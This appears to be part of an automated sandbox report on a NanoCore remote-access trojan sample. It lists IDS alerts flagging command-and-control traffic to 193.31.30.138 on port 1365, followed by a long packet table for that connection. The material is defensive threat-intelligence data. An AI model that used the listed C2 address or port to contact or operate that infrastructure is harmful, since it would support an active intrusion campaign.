                  192.168.2.4193.31.30.1384972213652816766 02/03/23-23:18:41.032521TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497221365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384972513652816766 02/03/23-23:18:59.896530TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497251365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384969313652816766 02/03/23-23:17:25.471865TCP2816766ETPRO TROJAN NanoCore RAT CnC 7496931365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384971513652816766 02/03/23-23:18:01.525116TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497151365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384969113652816766 02/03/23-23:17:14.041382TCP2816766ETPRO TROJAN NanoCore RAT CnC 7496911365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384972013652816766 02/03/23-23:18:27.458779TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497201365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384972413652816766 02/03/23-23:18:53.018271TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497241365192.168.2.4193.31.30.138

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 3, 2023 23:17:12.300127029 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.330926895 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.331037998 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.413235903 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.450130939 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.459686995 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.490725040 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.533387899 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.602159023 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.602196932 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.602216959 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.602238894 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.602257967 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.602314949 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.602349997 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.633047104 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.633085012 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.633105040 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.633125067 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.633155107 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.633167982 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.633177996 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.633197069 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.633215904 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.633235931 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.633251905 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.633261919 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.633284092 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.664132118 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664169073 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664189100 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664208889 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664230108 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664251089 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664272070 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664295912 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664321899 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.664343119 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.664355993 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664361954 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.664381027 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664398909 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664417982 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664436102 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.664446115 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664464951 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.664474010 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664491892 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664510965 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664525986 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.664537907 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.664560080 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.695408106 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695442915 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695462942 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695485115 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695504904 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695522070 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.695548058 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695557117 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.695575953 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695589066 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.695605040 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695625067 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695646048 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695671082 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695678949 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.695699930 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695708990 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.695729017 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695739985 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.695759058 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695779085 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695799112 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695817947 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.695828915 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695847034 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.695858955 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695879936 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695900917 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695918083 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.695930958 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695944071 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.695959091 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.695980072 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.696002007 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.696022987 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.696033001 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.696053028 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.696062088 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.696079969 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.696095943 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.696108103 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.696127892 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.696147919 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.696166039 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.696176052 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.696194887 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.696202993 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.726975918 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727005005 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727025032 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727046013 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727066994 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727087975 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727099895 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727123976 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727132082 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727149963 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727161884 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727181911 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727195024 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727214098 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727236032 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727247953 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727267027 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727287054 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727308989 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727315903 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727338076 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727349997 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727369070 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727390051 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727399111 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727421045 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727442980 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727453947 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727472067 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727492094 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727502108 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727523088 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727544069 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727567911 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727575064 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727592945 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727619886 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727627993 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727646112 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727655888 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727675915 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727699041 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727711916 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727729082 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727740049 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727756977 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727776051 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727797031 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727816105 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727835894 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727858067 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727884054 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727899075 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727910042 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727927923 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727938890 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.727956057 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727974892 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.727994919 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.728017092 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.728024960 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.728043079 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.728055000 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.728072882 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.728082895 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.728100061 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.728118896 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.728137016 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.728157997 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.728164911 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.728183985 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.728193045 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.728207111 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.728238106 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.759027004 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759083986 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759144068 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759181023 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759207010 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.759247065 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759262085 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.759293079 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759325981 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759360075 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759381056 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.759409904 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759423971 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.759454966 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759488106 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759524107 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759540081 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.759574890 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759586096 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.759615898 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759650946 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759682894 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759701014 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.759737015 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759747982 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.759778976 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759812117 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759845018 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759860039 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.759888887 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.759905100 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759938002 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.759970903 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760004044 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760019064 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760055065 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760066032 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760097027 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760128975 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760162115 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760189056 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760215044 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760225058 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760255098 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760288954 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760304928 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760334015 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760365009 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760397911 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760416985 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760443926 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760457039 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760488987 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760523081 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760555983 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760575056 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760596991 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760615110 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760644913 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760678053 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760713100 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760735989 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760762930 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760797024 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760832071 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760848045 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760885000 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760895967 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.760925055 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760958910 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.760993004 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.761008024 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.761043072 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.761054039 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.761085033 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.761107922 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.761163950 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.792197943 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792285919 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792334080 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792382956 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.792417049 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792470932 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792484999 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.792526007 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792570114 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792620897 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792634010 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.792671919 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.792695045 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792742014 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792787075 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792856932 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792870998 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.792903900 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.792936087 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.792984009 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793031931 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793082952 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.793101072 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793148041 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.793169022 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793217897 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793266058 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793320894 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793334961 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.793366909 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.793396950 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793443918 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793490887 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793544054 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793556929 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.793590069 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.793621063 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793668985 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793715954 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793756008 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793776035 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.793823004 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793869972 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793926001 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.793940067 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.793972969 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.794003010 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794049978 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794096947 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794151068 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794166088 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.794210911 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794234037 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.794279099 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794326067 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794379950 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794394016 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.794430017 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.794457912 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794504881 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794553995 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794609070 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794622898 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.794655085 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.794687033 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794775009 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794821978 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794867992 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.794889927 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.794924021 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.794956923 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.795002937 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.795049906 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.795084000 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.795114994 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.795150995 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.795172930 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.825907946 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.825948000 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.825972080 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.825994968 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.826129913 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.826808929 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.827497959 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.827524900 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.827545881 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.827567101 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.827581882 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.827601910 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.827620983 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:12.827637911 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:12.827650070 CET136549691193.31.30.138192.168.2.4
